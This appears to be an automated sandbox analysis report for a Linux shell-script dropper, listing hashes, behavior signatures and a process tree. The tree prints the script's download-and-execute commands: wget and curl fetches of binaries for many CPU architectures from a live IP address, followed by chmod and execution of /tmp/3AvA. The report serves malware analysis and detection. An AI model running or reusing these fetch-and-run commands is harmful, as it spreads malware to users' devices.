Analysis
max time kernel: 79s
max time network: 83s
platform: debian-9_mipsel
resource: debian9-mipsel-20240226-en
resource tags: arch:mipsel, image:debian9-mipsel-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 24/11/2024, 01:19
Static task: static1
Behavioral task: behavioral1
  Sample: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
  Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
  Sample: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
  Resource: debian9-mipsel-20240226-en
General
Target: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Size: 1KB
MD5: 513641f5f60d55559c2060489de6d605
SHA1: c95feec2255732b60d434b0639b88a5cff205ea0
SHA256: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
SHA512: 71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0
Malware Config
Signatures

File and Directory Permissions Modification (1 TTPs, 10 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
836  chmod
842  chmod
740  chmod
752  chmod
769  chmod
848  chmod
854  chmod
860  chmod
723  chmod
734  chmod

Executes dropped EXE (10 IoCs)
ioc        pid  Process
/tmp/3AvA  725  3AvA
/tmp/3AvA  735  3AvA
/tmp/3AvA  741  3AvA
/tmp/3AvA  753  3AvA
/tmp/3AvA  771  3AvA
/tmp/3AvA  837  3AvA
/tmp/3AvA  843  3AvA
/tmp/3AvA  849  3AvA
/tmp/3AvA  855  3AvA
/tmp/3AvA  861  3AvA

Reads runtime system information
description              ioc                            Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl

System Network Configuration Discovery (1 TTPs, 4 IoCs)
Adversaries may gather information about the network configuration of a system.
pid  Process
727  wget
730  curl
733  cat
735  3AvA

Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
description                   ioc        Process
File opened for modification  /tmp/3AvA  1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Processes
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh: /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
  - Writes file to tmp directory
  PID: 699

  Child processes of PID 699:

  /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.x86
    PID: 705

  /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.x86
    - Reads runtime system information
    PID: 711

  /bin/cat: cat UnHAnaAW.x86
    PID: 721

  /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm
    - File and Directory Permissions Modification
    PID: 723

  /tmp/3AvA: ./3AvA x86
    - Executes dropped EXE
    PID: 725

  /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.mips
    - System Network Configuration Discovery
    PID: 727

  /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.mips
    - Reads runtime system information
    - System Network Configuration Discovery
    PID: 730

  /bin/cat: cat UnHAnaAW.mips
    - System Network Configuration Discovery
    PID: 733

  /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm
    - File and Directory Permissions Modification
    PID: 734

  /tmp/3AvA: ./3AvA mips
    - Executes dropped EXE
    - System Network Configuration Discovery
    PID: 735

  /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.mpsl
    PID: 737

  /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl
    - Reads runtime system information
    PID: 738

  /bin/cat: cat UnHAnaAW.mpsl
    PID: 739

  /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm
    - File and Directory Permissions Modification
    PID: 740

  /tmp/3AvA: ./3AvA mpsl
    - Executes dropped EXE
    PID: 741

  /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm4
    PID: 743

  /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm4
    - Reads runtime system information
    PID: 744

  /bin/cat: cat UnHAnaAW.arm4
    PID: 750

  /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm
    - File and Directory Permissions Modification
    PID: 752

  /tmp/3AvA: ./3AvA arm4
    - Executes dropped EXE
    PID: 753

  /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm5
    PID: 758

  /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm5
    - Reads runtime system information
    PID: 761

  /bin/cat: cat UnHAnaAW.arm5
    PID: 768

  /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
    - File and Directory Permissions Modification
    PID: 769

  /tmp/3AvA: ./3AvA arm5
    - Executes dropped EXE
    PID: 771

  /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm6
    PID: 773

  /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm6
    - Reads runtime system information
    PID: 834

  /bin/cat: cat UnHAnaAW.arm6
    PID: 835

  /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
    - File and Directory Permissions Modification
    PID: 836

  /tmp/3AvA: ./3AvA arm6
    - Executes dropped EXE
    PID: 837

  /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm7
    PID: 839

  /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm7
    - Reads runtime system information
    PID: 840

  /bin/cat: cat UnHAnaAW.arm7
    PID: 841

  /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
    - File and Directory Permissions Modification
    PID: 842

  /tmp/3AvA: ./3AvA arm7
    - Executes dropped EXE
    PID: 843

  /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.ppc
    PID: 845

  /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.ppc
    - Reads runtime system information
    PID: 846

  /bin/cat: cat UnHAnaAW.ppc
    PID: 847

  /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
    - File and Directory Permissions Modification
    PID: 848

  /tmp/3AvA: ./3AvA ppc
    - Executes dropped EXE
    PID: 849

  /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.m68k
    PID: 851

  /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.m68k
    - Reads runtime system information
    PID: 852

  /bin/cat: cat UnHAnaAW.m68k
    PID: 853

  /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
    - File and Directory Permissions Modification
    PID: 854

  /tmp/3AvA: ./3AvA m68k
    - Executes dropped EXE
    PID: 855

  /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.sh4
    PID: 857

  /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.sh4
    - Reads runtime system information
    PID: 858

  /bin/cat: cat UnHAnaAW.sh4
    PID: 859

  /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA
    - File and Directory Permissions Modification
    PID: 860

  /tmp/3AvA: ./3AvA sh4
    - Executes dropped EXE
    PID: 861